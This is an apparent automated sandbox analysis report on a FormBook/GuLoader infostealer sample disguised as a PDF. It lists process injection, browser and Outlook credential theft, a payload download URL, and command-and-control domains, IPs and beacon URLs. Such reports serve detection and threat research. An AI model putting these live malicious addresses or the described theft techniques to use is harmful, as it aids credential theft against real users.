Source: C:\Windows\SysWOW64\write.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\write.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\write.exe Thread register set: target process: 3748 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\SysWOW64\write.exe Thread APC queued: target process: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Process created: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe "C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe" Jump to behavior
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe Process created: C:\Windows\SysWOW64\write.exe "C:\Windows\SysWOW64\write.exe" Jump to behavior
Source: C:\Windows\SysWOW64\write.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 0_2_00405D51 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA, 0_2_00405D51

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.17952328354.0000000000690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.13649482189.0000000036790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.17955935422.0000000004FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.17956116305.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.17954988019.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.13650313872.0000000036E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\write.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\write.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\write.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\write.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\write.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\write.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.17952328354.0000000000690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.13649482189.0000000036790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.17955935422.0000000004FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.17956116305.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.17954988019.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.13650313872.0000000036E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1430949 Sample: BM-FM_NR.24040718PDF.exe Startdate: 24/04/2024 Architecture: WINDOWS Score: 96 31 www.weave.game 2->31 33 www.ogunlewefamily.org.ng 2->33 35 24 other IPs or domains 2->35 47 Malicious sample detected (through community Yara rule) 2->47 49 Multi AV Scanner detection for submitted file 2->49 51 Yara detected FormBook 2->51 53 Yara detected GuLoader 2->53 10 BM-FM_NR.24040718PDF.exe 3 35 2->10         started        signatures3 process4 file5 29 C:\Users\user\AppData\Local\...\System.dll, PE32 10->29 dropped 13 BM-FM_NR.24040718PDF.exe 6 10->13         started        process6 dnsIp7 43 absorbante-calitate.ro 37.251.143.215, 443, 50244 WEBCLASSITRO Romania 13->43 65 Maps a DLL or memory area into another process 13->65 17 asoFfnDVnWYESbbZcbazpTYkAQVO.exe 13->17 injected signatures8 process9 signatures10 45 Found direct / indirect Syscall (likely to bypass EDR) 17->45 20 write.exe 13 17->20         started        process11 signatures12 55 Tries to steal Mail credentials (via file / registry access) 20->55 57 Tries to harvest and steal browser information (history, passwords, etc) 20->57 59 Modifies the context of a thread in another process (thread injection) 20->59 61 2 other signatures 20->61 23 asoFfnDVnWYESbbZcbazpTYkAQVO.exe 20->23 injected 27 firefox.exe 20->27         started        process13 dnsIp14 37 www.techfun.info 203.161.49.193, 50266, 50267, 50268 VNPT-AS-VNVNPTCorpVN Malaysia 23->37 39 www.lm2ue.us 91.195.240.123, 50282, 50283, 50284 SEDO-ASDE Germany 23->39 41 10 other IPs or domains 23->41 63 Found direct / indirect Syscall (likely to bypass EDR) 23->63 signatures15
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
157.7.107.63
 www.a-two-spa-salon.com Japan 7506 INTERQGMOInternetIncJP false
67.225.140.26
 ogunlewefamily.org.ng United States
32244 LIQUIDWEBUS false
137.220.252.40
 www.387mfyr.sbs Singapore
64050 BCPL-SGBGPNETGlobalASNSG false
51.77.215.151
 www.arilyfarlico.ru France
16276 OVHFR false
173.232.100.113
 www.whjzff.com United States
62904 EONIX-COMMUNICATIONS-ASBLOCK-62904US false
84.32.84.32
 noispisok.com Lithuania
33922 NTT-LT-ASLT false
64.190.62.22
 www.donantedeovulos.space United States
11696 NBS11696US false
91.195.240.123
 www.lm2ue.us Germany
47846 SEDO-ASDE false
91.195.240.19
 parkingpage.namecheap.com Germany
47846 SEDO-ASDE false
37.251.143.215
 absorbante-calitate.ro Romania
34358 WEBCLASSITRO false
203.161.49.193
 www.techfun.info Malaysia
45899 VNPT-AS-VNVNPTCorpVN false
108.186.8.155
 www.kader42.top United States
54600 PEGTECHINCUS false
118.27.122.214
 www.kansaiwoody.com Japan 7506 INTERQGMOInternetIncJP false

Contacted Domains

Name IP Active
noispisok.com 84.32.84.32 true
www.a-two-spa-salon.com 157.7.107.63 true
parkingpage.namecheap.com 91.195.240.19 true
www.kader42.top 108.186.8.155 true
www.lm2ue.us 91.195.240.123 true
www.387mfyr.sbs 137.220.252.40 true
berryandbird.co.uk 76.223.105.230 true
www.arilyfarlico.ru 51.77.215.151 true
www.techfun.info 203.161.49.193 true
ogunlewefamily.org.ng 67.225.140.26 true
badai77resmi.net 159.100.14.108 true
www.donantedeovulos.space 64.190.62.22 true
absorbante-calitate.ro 37.251.143.215 true
www.kansaiwoody.com 118.27.122.214 true
www.whjzff.com 173.232.100.113 true
www.nurenose.com unknown unknown
www.weave.game unknown unknown
www.lfsig.autos unknown unknown
www.berryandbird.co.uk unknown unknown
www.fashionagencylab.com unknown unknown
www.mxgovonline.com unknown unknown
www.concretedailypress.net unknown unknown
www.muslimsmat.com unknown unknown
www.ogunlewefamily.org.ng unknown unknown
www.badai77resmi.net unknown unknown
www.noispisok.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.nurenose.com/8cgp/ false
  • Avira URL Cloud: safe
 unknown
http://www.387mfyr.sbs/8cgp/?Xh9lX=27hjRPCyRlHKx+9Yvp9X/66HqVrlT4yXNX1Fx10RnhcFdFyjtbgqtspXt/m7h19M1tNaQu/ADV6ErOuMACLC0xl2a7R1sTqGKQn1UwmaLCfsUIitr9DM5TM=&ad64=U4M8cbh8kd false
  • Avira URL Cloud: safe
 unknown
http://www.ogunlewefamily.org.ng/8cgp/ false
  • Avira URL Cloud: safe
 unknown
http://www.whjzff.com/8cgp/ false
  • Avira URL Cloud: safe
 unknown
https://absorbante-calitate.ro/calitateX/lUMnxNJflRDqoVSbz65.bin false
  • Avira URL Cloud: safe
 unknown
http://www.concretedailypress.net/8cgp/ false
  • Avira URL Cloud: safe
 unknown
http://www.noispisok.com/8cgp/ false
  • Avira URL Cloud: safe
 unknown
http://www.kansaiwoody.com/8cgp/ false
  • Avira URL Cloud: safe
 unknown
http://www.concretedailypress.net/8cgp/?Xh9lX=fnwN1v/cGsL5Viy/xGPo7bu3BFyPSCGRcDxJWuOrmZaTk6+QfBJJ6K85NdT8x6wg+kdjGkUCY343uxqa5Yt4yEVQtg3mZjTzeLq2Z0Ov3khzfcaVVj80n48=&ad64=U4M8cbh8kd false
  • Avira URL Cloud: safe
 unknown
http://www.kader42.top/8cgp/ false
  • Avira URL Cloud: safe
 unknown
http://www.a-two-spa-salon.com/8cgp/ false
  • Avira URL Cloud: safe
 unknown
http://www.techfun.info/8cgp/ false
  • Avira URL Cloud: safe
 unknown
http://www.lm2ue.us/8cgp/ false
  • Avira URL Cloud: safe
 unknown
http://www.387mfyr.sbs/8cgp/ false
  • Avira URL Cloud: safe
 unknown
http://www.donantedeovulos.space/8cgp/ false
  • Avira URL Cloud: safe
 unknown